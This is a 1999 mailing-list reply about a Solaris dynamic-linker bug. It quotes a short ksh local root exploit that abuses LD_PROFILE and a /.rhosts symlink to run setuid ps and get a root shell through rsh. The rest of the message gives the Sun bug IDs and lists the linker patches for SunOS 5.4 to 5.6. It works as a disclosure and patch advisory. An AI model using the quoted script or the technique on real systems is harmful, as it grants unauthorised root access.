>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
># LD_PROFILE local root exploit for solaris
># [EMAIL PROTECTED] 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + > /.rhosts
>rsh -l root localhost csh -i
This is bug 4150646 (or rather, 1241843, which resurfaced after an
extensive rewrite of the dynamic linker)
It's been fixed in Solaris 7 and with the following patches in other
releases:
103242-07: SunOS 5.5: linker patch
103243-07: SunOS 5.5_x86: linker patch
103627-11: SunOS 5.5.1: Linker patch
103628-10: SunOS 5.5.1_x86: Linker patch
105490-07: SunOS 5.6: linker patch
105491-05: SunOS 5.6_x86: linker patch
The bug was originally fixed in 5.5.1 and back patched; I rediscovered that
it was back in 2.6 (which also meant it was in the process of being patched
back into 5.5/5.5.1, but I think those patches were held up until the
regression was fixed); this was all well before S7 was released.
The original bug was also fixed in the following patches:
102049-05: SunOS 5.4: linker fixes
102303-05: SunOS 5.4: POINT PATCH: linker fixes
102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes
102778-03: SunOS 5.4_x86: linker patch
Casper
